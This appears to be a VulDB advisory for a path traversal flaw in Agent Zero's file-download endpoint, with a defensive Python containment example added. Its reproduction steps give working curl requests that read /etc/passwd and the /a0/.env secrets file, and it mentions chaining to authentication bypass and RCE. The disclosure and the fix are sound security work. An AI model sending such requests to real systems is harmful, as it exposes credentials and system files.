Submit #771967: frdel agent-zero 0.9.7-10 Path Traversal (CWE-22)

Title: frdel agent-zero 0.9.7-10 Path Traversal (CWE-22)
Description:

# Technical Details

An Arbitrary File Read via Path Traversal vulnerability exists in the `get_abs_path()` function in `python/helpers/files.py` of Agent Zero. The application fails to validate that user-supplied file paths remain within the intended workspace directory. Python's `os.path.join()` discards all previous path components when given an absolute path, allowing attackers to escape the workspace directory.

# Vulnerable Code

- File: `python/helpers/files.py` (`get_abs_path` function)
- Method: `get_abs_path(*relative_paths)` -> `os.path.join(get_base_dir(), *relative_paths)`
- Why: `os.path.join("/workspace", "/etc/passwd")` returns `"/etc/passwd"`, completely ignoring the base directory.
- Endpoint: `python/api/download_work_dir_file.py`
- Flow: `GET /download_work_dir_file?path=/etc/passwd` -> `file_info.get_file_info("/etc/passwd")` -> `files.get_abs_path("/etc/passwd")` -> returns `"/etc/passwd"`

# Reproduction

1. Start Agent Zero: `docker run -d -p 50001:80 agent0ai/agent-zero:latest`
2. Get CSRF token: `curl -s -c /tmp/cookies.txt "http://localhost:50001/csrf_token"`
3. Read /etc/passwd: `curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/etc/passwd"`
4. Read secrets: `curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/a0/.env"`

# Impact

- Arbitrary file read (system files, SSH keys, cloud credentials)
- Exfiltration of API keys and secrets from /a0/.env
- Chain with leaked A0_PERSISTENT_RUNTIME_ID for authentication bypass and RCE
Source: ⚠️ https://gist.github.com/YLChen-007/1819c843ad26aaaaecdc768a789df022
User: Eric-y (UID 95889)
Submission: 2026-03-05 03:23 (1 month ago)
Moderation: 2026-03-16 22:32 (12 days later)
Status: Accepted
VulDB entry: 351337 [frdel/agent0ai agent-zero 0.9.7-10 python/helpers/files.py get_abs_path directory traversal]
Points: 20
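
The `os.path.join()` behaviour described in the submission, shown next to a containment check that rejects it. This is an added example, not Agent Zero's code or the project's fix; `BASE_DIR`, `get_abs_path_unsafe`, `get_abs_path_contained` and `check` are hypothetical names, and the sample paths are constructed.

```python
import os

# Assumed base directory for illustration; the submission's own example uses "/workspace".
BASE_DIR = "/workspace"


def get_abs_path_unsafe(*relative_paths: str) -> str:
    """Model of the pattern the submission describes: a bare os.path.join()."""
    return os.path.join(BASE_DIR, *relative_paths)


def get_abs_path_contained(*relative_paths: str, base_dir: str = BASE_DIR) -> str:
    """Hypothetical hardened variant: resolve first, then require containment."""
    base = os.path.realpath(base_dir)
    # realpath() collapses "..", follows symlinks, and still lets an absolute
    # component replace the base, so the check must run on the final result.
    candidate = os.path.realpath(os.path.join(base, *relative_paths))
    # commonpath() compares whole path components, so "/workspace_evil"
    # is not mistaken for a child of "/workspace" (a str.startswith pitfall).
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes base directory: {candidate!r}")
    return candidate


def check(path: str) -> str:
    """Return the contained path, or 'REJECTED', for the demo below."""
    try:
        return get_abs_path_contained(path)
    except PermissionError:
        return "REJECTED"


if __name__ == "__main__":
    # Constructed sample inputs: one normal path, then three escape attempts.
    for p in ["notes/todo.txt", "/etc/passwd", "../etc/passwd", "../workspace_evil/x"]:
        print(f"{p!r:24} unsafe={get_abs_path_unsafe(p)!r:32} contained={check(p)}")
```

The check runs on the resolved path rather than the raw input, so a symlink inside the workspace that points outside it is rejected as well.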